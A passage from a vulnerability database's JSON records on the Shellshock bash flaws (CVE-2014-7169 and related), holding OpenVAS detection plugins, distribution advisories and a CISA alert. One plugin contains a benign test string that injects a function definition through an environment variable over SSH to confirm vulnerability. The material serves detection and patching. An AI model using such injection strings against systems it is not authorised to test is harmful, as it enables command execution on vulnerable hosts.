sock ) exit( 0 );\n\nif( bin == \"unknown\" )\n bash_cmd = \"bash\";\nelse if( bin =~ \"^/.*bash$\" )\n bash_cmd = bin;\nelse\n exit( 0 ); # Safeguard if something is broken in the bash detection\n\n# echo \"vt_test='() { echo vulnerable; }' /bin/bash -c vt_test\" | /bin/bash\ncmd = 'echo \"' + \"vt_test='() { echo CVE-2014-6278 vulnerable; }' \" + bash_cmd + \" -c vt_test\" + '\" | ' + bash_cmd;\n\nresult = ssh_cmd( socket:sock, cmd:cmd, nosh:TRUE );\nclose( sock );\n\nif( \"Unsupported use of '='\" >< result ) exit( 99 );\n\nif( \"CVE-2014-6278 vulnerable\" >< result ) {\n report = \"Used command: \" + cmd + '\\n\\nResult: ' + result;\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:14", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-13T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850778", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850778", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850778\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1247-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and is less serious due to the\n special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_.\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally, two other security issues have been fixed:\n\n * CVE-2014-7186: Nested HERE documents 
could lead to a crash of bash.\n\n * CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1247-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLES11.0SP3\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5\", rpm:\"libreadline5~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-32bit\", rpm:\"libreadline5-32bit~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-x86\", rpm:\"bash-x86~3.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline5-x86\", rpm:\"libreadline5-x86~5.2~147.22.1\", rls:\"SLES11.0SP3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, 
"vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T16:39:05", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-18T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310850676", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850676", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850676\");\n script_version(\"2020-04-02T11:36:28+0000\");\n script_tag(name:\"deprecated\", value:TRUE);\n script_tag(name:\"last_modification\", value:\"2020-04-02 11:36:28 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 10:31:31 +0200 (Fri, 18 Sep 2015)\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for bash (openSUSE-SU-2014:1254-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\n\n This NVT has been deprecated because no proper information available\n from advisory link.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"bash was updated to fix command injection via environment variables.\n (CVE-2014-6271, CVE-2014-7169)\n\n Also a hardening patch was applied that only imports functions over\n BASH_FUNC_ prefixed environment variables.\n\n Also fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents\n and for loop issue\");\n\n script_tag(name:\"affected\", value:\"bash on openSUSE 13.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"openSUSE-SU\", value:\"2014:1254-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n\n exit(0);\n}\n\nexit(66); ## This NVT is deprecated as proper information is not available in advisory. There is also no bash~4.2~75.4.1 on opensuse. the complete NVT is wrong.\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:38:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "openvas", "title": "SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850890", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850890\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 13:37:55 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\", \"CVE-2014-6271\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for bash (SUSE-SU-2014:1259-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bash'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The command-line shell 'bash' evaluates environment variables, which\n allows the injection of characters and might be used to access files on\n the system in some circumstances (CVE-2014-7169).\n\n Please note that this issue is different from a previously fixed\n vulnerability tracked under CVE-2014-6271 and it is less serious due to\n the special, non-default system configuration that is needed to create an\n exploitable situation.\n\n To remove further exploitation potential we now limit the\n function-in-environment variable to variables prefixed with BASH_FUNC_ .\n This hardening feature is work in progress and might be improved in later\n updates.\n\n Additionally two more security issues were fixed in bash: CVE-2014-7186:\n Nested HERE documents 
could lead to a crash of bash.\n\n CVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n\n script_tag(name:\"affected\", value:\"bash on SUSE Linux Enterprise Server 12, SUSE Linux Enterprise Desktop 12\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1259-1\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7169\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7187\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-6271\");\n script_xref(name:\"URL\", value:\"https://www.suse.com/de-de/security/cve/CVE-2014-7186\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(SLED12\\.0SP0|SLES12\\.0SP0)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"SLED12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-lang\", rpm:\"bash-lang~4.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLED12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n 
security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"SLES12.0SP0\") {\n if(!isnull(res = isrpmvuln(pkg:\"bash\", rpm:\"bash~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libreadline6\", rpm:\"libreadline6~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"bash-doc\", rpm:\"bash-doc~4.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"readline-doc\", rpm:\"readline-doc~6.2~75.2\", rls:\"SLES12.0SP0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-07T18:47:38", "description": "A number of security vulnerabilities have been identified in the\n `bash", "cvss3": {}, "published": "2014-12-18T00:00:00", "type": "openvas", "title": "Citrix XenServer Shellshock Security Update (CTX200223)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7187", "CVE-2014-6271", "CVE-2014-7186"], "modified": "2020-04-02T00:00:00", "id": "OPENVAS:1361412562310105146", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105146", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Citrix XenServer Shellshock Security Update (CTX200223)\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:citrix:xenserver\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105146\");\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-6277\", \"CVE-2014-6278\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2020-04-02T13:53:24+0000\");\n\n script_name(\"Citrix XenServer Shellshock Security Update (CTX200223)\");\n\n script_xref(name:\"URL\", value:\"http://support.citrix.com/article/CTX200223\");\n\n script_tag(name:\"vuldetect\", value:\"Check the installed hotfixes.\");\n\n script_tag(name:\"solution\", value:\"Apply the hotfix referenced in the advisory.\");\n\n script_tag(name:\"summary\", value:\"A number of security vulnerabilities have been identified in the\n `bash' component of Citrix XenServer. 
These issues include those known as `Shellshock'\");\n\n script_tag(name:\"affected\", value:\"These issues affect all supported versions of Citrix XenServer up\n to and including Citrix XenServer 6.2 Service Pack 1.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-02 13:53:24 +0000 (Thu, 02 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-12-18 17:37:46 +0100 (Thu, 18 Dec 2014)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Citrix Xenserver Local Security Checks\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_xenserver_version.nasl\");\n script_mandatory_keys(\"xenserver/product_version\", \"xenserver/patches\");\n\n exit(0);\n}\n\ninclude(\"citrix_version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\nif( ! hotfixes = get_kb_item(\"xenserver/patches\") )\n exit( 0 );\n\npatches = make_array();\n\npatches['6.2.0'] = make_list( 'XS62ESP1014' );\npatches['6.1.0'] = make_list( 'XS61E044' );\npatches['6.0.2'] = make_list( 'XS602E037', 'XS602ECC013' );\npatches['6.0.0'] = make_list( 'XS60E041' );\n\ncitrix_xenserver_check_report_is_vulnerable( version:version, hotfixes:hotfixes, patches:patches );\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2022-01-04T12:48:09", "description": "Tavis Ormandy discovered that the security fix for Bash included in \nUSN-2362-1 was incomplete. An attacker could use this issue to bypass \ncertain environment restrictions. 
(CVE-2014-7169)\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "ubuntu", "title": "Bash vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "USN-2363-1", "href": "https://ubuntu.com/security/notices/USN-2363-1", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-04T12:48:11", "description": "USN-2363-1 fixed a vulnerability in Bash. Due to a build issue, the patch \nfor CVE-2014-7169 didn't get properly applied in the Ubuntu 14.04 LTS \npackage. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nTavis Ormandy discovered that the security fix for Bash included in \nUSN-2362-1 was incomplete. An attacker could use this issue to bypass \ncertain environment restrictions. 
(CVE-2014-7169)\n", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "ubuntu", "title": "Bash vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-26T00:00:00", "id": "USN-2363-2", "href": "https://ubuntu.com/security/notices/USN-2363-2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:51:10", "description": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain\nmalformed function definitions in the values of environment variables,\nwhich allows remote attackers to write to files or possibly have unknown\nother impact via a crafted environment, as demonstrated by vectors\ninvolving the ForceCommand feature in OpenSSH sshd, the mod_cgi and\nmod_cgid modules in the Apache HTTP Server, scripts executed by unspecified\nDHCP clients, and other situations in which setting the environment occurs\nacross a privilege boundary from Bash execution. 
NOTE: this vulnerability\nexists because of an incomplete fix for CVE-2014-6271.\n\n#### Bugs\n\n * <https://bugs.launchpad.net/ubuntu/+source/bash/+bug/1373781>\n * <https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-7169>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c23>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | It was discovered that a build issue prevented the fix from being applied properly in the 4.3-7ubuntu1.2 package for Ubuntu 14.04 LTS. A respin was released to 4.3-7ubuntu1.3 to correct the issue, and USN-2363-2 was published.\n", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-7169", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "UB:CVE-2014-7169", "href": "https://ubuntu.com/security/CVE-2014-7169", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:19", "description": "[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3075", "href": "http://linux.oracle.com/errata/ELSA-2014-3075.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2019-05-29T18:36:38", "description": "[3.0-27.0.2]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3078", "href": "http://linux.oracle.com/errata/ELSA-2014-3078.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:40", "description": "[4.2.45-5.2.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3076", "href": "http://linux.oracle.com/errata/ELSA-2014-3076.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:34", "description": "[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-3077", "href": "http://linux.oracle.com/errata/ELSA-2014-3077.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:46", "description": "[4.2.45-5.4]\n- CVE-2014-7169\n Resolves: #1146324\n[4.2.45-5.3]\n- amend patch to match upstream's\n Related: #1146324\n[4.2.45-5.2]\n- Fix-up the patch\n Related: #1141647", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-09-25T00:00:00", "id": "ELSA-2014-1306", "href": "http://linux.oracle.com/errata/ELSA-2014-1306.html", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:54", "description": "[3.0-27.0.3]\n- Rework env function definition for safety (Florian Weimer) [CVE-2014-7169]", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "oraclelinux", "title": "bash security update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-7169", "CVE-2014-7187", "CVE-2014-7186"], "modified": "2014-09-26T00:00:00", "id": "ELSA-2014-3079", "href": "http://linux.oracle.com/errata/ELSA-2014-3079.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:08:20", "description": "Oracle has released security updates to address bash vulnerabilities found across multiple products.\n\nUS-CERT recommends users and administrators review the Oracle Security [Article](<http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html>) for additional details, and apply updates as necessary.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2014/10/07/Oracle-Patches-Bash-Vulnerabilities>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {}, "published": "2014-10-07T00:00:00", "type": "cisa", "title": "Oracle Patches Bash Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2014-7169"], "modified": "2014-10-10T00:00:00", "id": "CISA:B34E259AF2C60E40987A939F5D7742F9", "href": "https://us-cert.cisa.gov/ncas/current-activity/2014/10/07/Oracle-Patches-Bash-Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2021-07-28T14:46:44", "description": "New bash packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bash-4.2.048-i486-2_slack14.1.txz: Rebuilt.\n Patched an additional trailing string processing vulnerability discovered\n by Tavis Ormandy.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 